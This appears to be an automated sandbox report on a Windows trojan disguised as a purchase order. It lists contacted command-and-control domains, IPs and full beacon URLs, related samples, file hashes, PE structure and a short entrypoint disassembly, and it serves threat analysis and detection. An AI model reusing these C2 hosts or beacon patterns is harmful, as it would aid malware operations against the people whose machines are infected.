Two caveats when reading this table. The font-vendor URLs (founder.com.cn, tiro.com, goodfont.co.kr, carterandcone, sajatypeworks, typography.net, galapagosdesign, fontfabrik, jiyu-kobo, sandoll, urwpp, zhongyicts, sakkal), several with trailing junk characters, are strings carried by explorer.exe's own memory (compare the source column under "URLs from Memory and Binaries" below) and are not indicators of this sample. Conversely, the "safe" verdicts on the /igqu/ URLs are host-reputation results; the same URLs are marked malicious in "Contacted URLs" below because the sandbox observed the injected explorer.exe requesting them.

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.realitytvstockwatch.com | 103.224.182.242 | true | true | - | unknown
www.the-gongs.com | 104.253.79.71 | true | true | - | unknown
td-balancer-euw2-6-109.wixdns.net | 35.246.6.109 | true | true | - | unknown
sweetbasilmarketing.com | 185.201.11.126 | true | true | - | unknown
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 3.12.202.18 | true | false | - | high
www.maninhatphoto.com | 154.86.218.70 | true | true | - | unknown
fahufu.com | 194.35.122.226 | true | true | - | unknown
www.justsoldbykristen.com | 52.71.133.130 | true | true | - | unknown
heartandcrowncloset.com | 160.153.136.3 | true | true | - | unknown
searchnehomes.com | 34.102.136.180 | true | true | - | unknown
www.lotoencasa.com | 192.155.168.14 | true | false | - | unknown
www.ariasu-nakanokaikei.com | 13.226.173.80 | true | true | - | unknown
www.hemparcade.com | 52.58.78.16 | true | true | - | unknown
www.searchnehomes.com | unknown | unknown | true | - | unknown
www.heartandcrowncloset.com | unknown | unknown | true | - | unknown
www.fahufu.com | unknown | unknown | true | - | unknown
www.placeduconfort.com | unknown | unknown | true | - | unknown
www.handsfreedocs.com | unknown | unknown | true | - | unknown
www.shopnicknaks.com | unknown | unknown | true | - | unknown
www.happinestbuilders.com | unknown | unknown | true | - | unknown
www.sweetbasilmarketing.com | unknown | unknown | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.the-gongs.com/igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr | true | Avira URL Cloud: safe | unknown
http://www.sweetbasilmarketing.com/igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr | true | Avira URL Cloud: safe | unknown
http://www.fahufu.com/igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr | true | Avira URL Cloud: safe | unknown
http://www.ariasu-nakanokaikei.com/igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr | true | Avira URL Cloud: safe | unknown
http://www.realitytvstockwatch.com/igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr | true | Avira URL Cloud: safe | unknown
http://www.hemparcade.com/igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr | true | Avira URL Cloud: safe | unknown
http://www.placeduconfort.com/igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr | true | Avira URL Cloud: safe | unknown
http://www.maninhatphoto.com/igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr | true | Avira URL Cloud: safe | unknown
http://www.heartandcrowncloset.com/igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr | true | Avira URL Cloud: safe | unknown
http://www.happinestbuilders.com/igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr | true | Avira URL Cloud: safe | unknown
http://www.searchnehomes.com/igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr | true | Avira URL Cloud: safe | unknown
http://www.justsoldbykristen.com/igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr | true | Avira URL Cloud: safe | unknown
http://www.shopnicknaks.com/igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr | true | Avira URL Cloud: safe | unknown

                                                  URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000002.00000002.517836476.0000000006845000.00000004.00000001.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | - | high
http://www.hemparcade.com/ | ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe (reported 3 times) | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | - | high
http://yuyabo.com/ | ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hemparcade.com | ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe (reported 3 times) | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | - | high
http://www.goodfont.co.kr | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe (reported 3 times) | unknown
http://www.carterandcone.coml | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe (reported 3 times) | unknown
http://www.sajatypeworks.com | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe (reported 3 times) | unknown
http://www.typography.netD | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe (reported 3 times) | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe (reported 3 times) | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe (reported 3 times) | unknown
http://fontfabrik.com | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe (reported 3 times) | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe (reported 3 times) | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe (reported 3 times) | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe (reported 3 times) | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | - | high
http://www.fonts.com | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe (reported 3 times) | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe (reported 3 times) | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe (reported 3 times) | unknown
http://www.sakkal.com | explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe (reported 3 times) | unknown

Note on reading this table: the rows sourced from the explorer.exe dump are font-vendor licence and designer strings (fontbureau.com, typography.net, founder.com.cn, sakkal.com and similar) that sit in explorer.exe's own memory regardless of the sample, and the stray trailing characters (designersG, typography.netD, coml) are string-carving artefacts; none of them is an indicator for this sample. The rows sourced from ipconfig.exe, the process in which the sample's network strings were found (www.hemparcade.com, yuyabo.com), are the ones to treat as C2 candidates, and the "safe" verdicts against them only say the URL-reputation services had not catalogued the domains at analysis time.

                                                                        Contacted IPs


                                                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.58.78.16 | unknown | United States | 16509 | AMAZON-02, US | true
194.35.122.226 | unknown | Germany | 35913 | DEDIPATH-LLC, US | true
185.201.11.126 | unknown | Germany | 47583 | AS-HOSTINGER, LT | true
3.134.22.63 | unknown | United States | 16509 | AMAZON-02, US | true
160.153.136.3 | unknown | United States | 21501 | GODADDY-AMS, DE | true
103.224.182.242 | unknown | Australia | 133618 | TRELLIAN-AS-AP Trellian Pty Limited, AU | true
104.253.79.71 | unknown | United States | 18779 | EGIHOSTING, US | true
52.71.133.130 | unknown | United States | 14618 | AMAZON-AES, US | true
3.12.202.18 | unknown | United States | 16509 | AMAZON-02, US | false
35.246.6.109 | unknown | United States | 15169 | GOOGLE, US | true
154.86.218.70 | unknown | Seychelles | 134548 | DXTL-HK DXTL Tseung Kwan O Service, HK | true
34.102.136.180 | unknown | United States | 15169 | GOOGLE, US | true
13.226.173.80 | unknown | United States | 16509 | AMAZON-02, US | true

                                                                        General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 321097
Start date: 20.11.2020
Start time: 11:05:32
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 37s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Purchase Order 40,7045$.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/0@17/13
EGA Information: Failed
HDC Information:
• Successful, ratio: 53.2% (good quality ratio 48.5%)
• Quality average: 72.7%
• Quality standard deviation: 31.2%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                        • TCP Packets have been reduced to 100
                                                                        • Excluded IPs from analysis (whitelisted): 104.43.193.48, 40.88.32.150, 23.210.248.85, 104.42.151.234, 51.104.139.180, 2.23.155.168, 2.23.155.123, 2.23.155.138, 92.123.180.139, 92.123.180.131, 2.23.155.122, 2.23.155.114, 51.103.5.186, 52.155.217.156, 20.54.26.129, 95.101.22.125, 95.101.22.134
                                                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcolwus16.cloudapp.net

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        No simulations

                                                                        Joe Sandbox View / Context

                                                                        IPs

Match | Associated Sample Name / URL | Detection | Context
52.58.78.16 | Order specs19.11.20.exe | malicious | www.hopeharboracademy.com/nwrr/?Rxo=L6hH4NIhfjzT&cj=Pi3dZNULKacZO0lwTZm3VIIJvRqy9WRTjR1P4HicrXgGmUrIoUMqJ7S/A3ArvLwtmevO+VO23g==
52.58.78.16 | Purchase Order 40,7045.exe | malicious | www.hemparcade.com/igqu/?YnztXrjp=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98TKSXSboJU2x&sBZxwb=FxlXFP2PHdiD2
52.58.78.16 | SWIFT_HSBC Bank.exe | malicious | www.viltais.com/nt8e/?7nwltvxh=lPNjsY1H0UkcK2guRo/z/De4MaZSsgXVmjo1l8Wqu/JQpRHkDmjukntjJMa7ZMKbETQi&org=3foxnfCXOnIhKD
52.58.78.16 | Order Specification Requirement With Ref. AMABINIF38535.exe | malicious | www.stranded.xyz/utau/?p64=8prxehCX&2dZ8=dR3TRUG1QGrDYRBc9/3PRmogi1D8+kv0RMejNxu9Gn4uSO50WrJFoJLJiRJ5mGAJbjLS
52.58.78.16 | new file.exe.exe | malicious | www.sunflowersbikini.com/o1u9/?uFNH=XRlPhLopGJm&njkdnt=NfcJdyO4TBqmRNhg7R1KNJwTQ4N5hlclnZQkvT+zgqJmuxY/wV7RTlrJQJKYZhgz2gKA
52.58.78.16 | XCnhrl4qRO.exe | malicious | www.phybby.com/xnc/?iB=CnlpdrqHk6fHx&uN9da=KMkfkwH+qCev6y9SIhjzkdXaKQKuNlF/lv9fMwnf5/4ZPrTh2Mio2MF0cfaBEzR8Th1t
52.58.78.16 | COMMERCIAL INVOICE BILL OF LADING DOC.exe | malicious | www.basketdelivered.com/o9b2/?u6u4=7OzGVZ/w9qx4BfB58pU149PPhqFNbT8gk8tJrAZglrdYXTj2i3q7BPycRIRvKc0H9QVN&J484=xPJtLXbX
52.58.78.16 | tbzcpAZnBK.exe | malicious | www.jencian.com/t4vo/?t8S8=GNX37zD4+hCCMzbajgO2uA69rnGPPC6iQo0EFF7Ue/8gqGUBoM5ya+5BJI3qcC1vYrK1&Njfhlh=8p4PgtUX
52.58.78.16 | zYUJ3b5gQF.exe | malicious | www.hemparcade.com/igqu/?1b8hnra=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&OZNPdr=iJEt_DFhGZplHfm0
52.58.78.16 | COMMERCIAL INVOICE BILL OF LADING DOC.exe | malicious | www.basketdelivered.com/o9b2/?DVB0=pTlpd6wHb&QR0=7OzGVZ/w9qx4BfB58pU149PPhqFNbT8gk8tJrAZglrdYXTj2i3q7BPycRLxVaNU/n30K
52.58.78.16 | RFQ-1225 BE285-20-B-1-SMcS - Easi-Clip Project.exe | malicious | www.central.properties/vrf/?jVgH=aHUqqRuO6ZK9z0Ddr0bilnwC+HUi2BKQSuMw/XTnNfUykuBqiT/kuVIPFhCASh0TBUtx&-Zi=W6RxUV3PO
52.58.78.16 | Factura.exe | malicious | www.devcomunicacao.com/ve9i/?_f-tK4=pQO4LhLAXoDAWMXX61mXtQYyMLN+wLZ8Px2vxkY+llKJMI7QZndoWfY9jQFnQqWsTUfq&hvK8=Q4j0
52.58.78.16 | Purchase Order 40,7045$.exe | malicious | www.hemparcade.com/igqu/?GPWlMXk=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98TK4IiroNW+x&Ano=O2JpLTIpT0jt
52.58.78.16 | bSpRY88fjIgazcB.exe | malicious | www.cazoud.com/k8b/
52.58.78.16 | Lyh84tCfgI.exe | malicious | www.drillingclient.com/vdi/?FR9Tk=GbsOdEqF4JVfil823eZqM4/+KjPH9duQu8mBX7+Y8fERG1y/Z6ARoUoWNMmrIwW0wvQO&Bj=lHRH9PdPH6D
52.58.78.16 | HMT-200810-02.exe | malicious | www.devcomunicacao.com/ve9i/?GFNDK=pQO4LhLAXoDAWMXX61mXtQYyMLN+wLZ8Px2vxkY+llKJMI7QZndoWfY9jQFNPamsXWXq&CTvX=ctxhPjJH
52.58.78.16 | ORDER SPECIFICATIONS.exe | malicious | www.hopeharboracademy.com/nwrr/?3f=GPJl7HDX&lnSh=Pi3dZNULKacZO0lwTZm3VIIJvRqy9WRTjR1P4HicrXgGmUrIoUMqJ7S/A0s7z6sWhrGf
52.58.78.16 | COMMERCIAL INVOICE, BILL OF LADING, DOC.exe | malicious | www.basketdelivered.com/o9b2/?GpaPbN1H=7OzGVZ/w9qx4BfB58pU149PPhqFNbT8gk8tJrAZglrdYXTj2i3q7BPycRLx/F9k/j18K&2dhHV=R2MTzlWXnj
52.58.78.16 | 7w6Yl263sM.exe | malicious | www.3rddatebykyngsyx.com/bn4/?9rmDvZj=c2Muq4zPTcCBC0LqXiIHasvi02fcKdQIjwSYl/Xgpt6CXdm60GpX8/7SGI/sFKLwtSu4&lZ6l=p2JTBPQPHj4xOHJP
52.58.78.16 | Shippingdoc.exe | malicious | www.villadecorazones.com/oj6t/?J2JDYR=Dxox8ho8ARht&afhhAx9=GBhBOFl+UWRPfxznomUTr9M4uaIbOgsfI/ZUh/B3krKPcWLSoAsg43uzpPLYnEUAJ7iD5GNGfQ==
194.35.122.226 | Purchase Order 40,7045$.exe | malicious | www.fahufu.com/igqu/?1bkpkZ=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJj5U2S4c0Jgx&Bbm4Ad=3f7HcFtPz0f
185.201.11.126 | Purchase Order 40,7045.exe | malicious | www.sweetbasilmarketing.com/igqu/?YnztXrjp=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QKAoZ47NYbcr&sBZxwb=FxlXFP2PHdiD2
185.201.11.126 | Purchase Order 40,7045$.exe | malicious | www.sweetbasilmarketing.com/igqu/?afo=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&DHU4SX=gbT8543hIhm
185.201.11.126 | hjKM0s7CWW.exe | malicious | www.sweetbasilmarketing.com/igqu/?-Zlpd2H=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&2d=lneXf
185.201.11.126 | 9Ul8m9FQ47.exe | malicious | www.sweetbasilmarketing.com/igqu/?VR-X4=02JPGJu85hqTpbBp&ETmlgT7=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s
185.201.11.126 | n4uladudJS.exe | malicious | www.sweetbasilmarketing.com/igqu/?p0D=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QKACGILNcZUr&6l8l=BXeD1
185.201.11.126 | T66DUJYHQE.exe | malicious | www.sweetbasilmarketing.com/igqu/?sPuDZ26=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJs4FJn2fu16GZQE1w==&MvdT=2d2X
185.201.11.126 | NzI1oP5E74.exe | malicious | www.sweetbasilmarketing.com/igqu/?v6=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&1b=V6O83JaPw
185.201.11.126 | zYUJ3b5gQF.exe | malicious | www.sweetbasilmarketing.com/igqu/?1b8hnra=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&OZNPdr=iJEt_DFhGZplHfm0
185.201.11.126 | Purchase Order 40,7045$.exe | malicious | www.sweetbasilmarketing.com/igqu/?Ezu=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJs4FJn2fu16GZQE1w==&Rzr=M6hL9XnpVlsp
185.201.11.126 | Purchase Order 40,7045$.exe | malicious | www.sweetbasilmarketing.com/igqu/?8pMta2Q=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&othDaP=eVeHLbk8dP-D
185.201.11.126 | sXNQG9jqhR.exe | malicious | www.sweetbasilmarketing.com/igqu/?wx=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QKACGILNcZUr&Tj=xpFH
185.201.11.126 | Purchase Order 40,7045$.exe | malicious |
                                                                        • www.sweetbasilmarketing.com/igqu/?IR9D54=3fFxr&Mjq8ijoX=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QKACGILNcZUr
                                                                        Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                        • www.sweetbasilmarketing.com/igqu/?GPWlMXk=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QKACGILNcZUr&Ano=O2JpLTIpT0jt

Domains


ASN


JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.373704870948321
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Purchase Order 40,7045$.exe
File size: 369664 bytes
MD5: 4142c1713da2f4f94bec71bfed46587b
SHA1: 06cc7bd53758a0936f4b674847411a4f912fd654
SHA256: fd94ea05d07271de517e92af291ec6a8cff49cc83bb59f112efb6d5fec56809c
SHA512: 1693379c66da547efb6e200d5cfc33fe7a49f38ca5f4121690e371ed5e7aaea389363f88cbba68eef1f1c9ea6e8f2d42c3472ebb38f2d9bf2185178bd3f2e245
SSDEEP: 6144:xOz/xJi4Cnn9y6kyr+23yopaLxx9xKxDVFBqyaLv0Yd5bMceMau:xODxE7nnE6NrLqxxfQJFBqyEvF5yMau
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.uHr.uHr.uH...Hp.uH...Ha.uH...HD.uH...H..uH{..Ha.uHr.tH..uH...Hs.uH...Hs.uH...Hs.uHRichr.uH........................PE..L..

File Icon

Icon Hash: 34ecc4d0f0e8ccd4

Static PE Info

General

Entrypoint: 0x40c753
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x5FB69F90 [Thu Nov 19 16:38:40 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: ab2865aeb9fd256a577a2832dd6a376d

Entrypoint Preview

Instruction
call 00007F93F094583Dh
jmp 00007F93F093B8CEh
push dword ptr [0042D608h]
call dword ptr [0041F0A4h]
test eax, eax
je 00007F93F093BA44h
call eax
push 00000019h
call 00007F93F0945101h
push 00000001h
push 00000000h
call 00007F93F093F1B0h
add esp, 0Ch
jmp 00007F93F093F175h
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F93F093BA66h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F93F093BA90h
test ecx, 00000003h
jne 00007F93F093BA31h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007F93F093BA2Ah
mov eax, dword ptr [ecx-04h]
test al, al
je 00007F93F093BA74h
test ah, ah
je 00007F93F093BA66h
test eax, 00FF0000h
je 00007F93F093BA55h
test eax, FF000000h
je 00007F93F093BA44h
jmp 00007F93F093BA0Fh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx

Rich Headers

Programming Language:
• [LNK] VS2010 build 30319
• [ASM] VS2010 build 30319
• [ C ] VS2010 build 30319
• [C++] VS2010 build 30319
• [RES] VS2010 build 30319
• [IMP] VS2008 SP1 build 30729

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x29008          0xc8          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x30000          0x42e0        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x35000          0x213c        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x1f000          0x1f4         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x1d12e       0x1d200   False     0.534276086373   data       6.54668663912  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x1f000          0xaa9e        0xac00    False     0.383698219477   data       5.48251502126  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x2a000          0x53a4        0x3400    False     0.680588942308   data       6.53378088611  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc   0x30000          0x42e0        0x4400    False     0.0522173713235  data       2.29893765685  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x35000          0x2b5a        0x2c00    False     0.593306107955   data       5.76069468977  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name           RVA      Size    Language  Country        Type
RT_ICON        0x300a0  0x4228  English   United States  dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 57599, next used block 4294967040
RT_GROUP_ICON  0x342c8  0x14    English   United States  data

Imports

DLL           Import
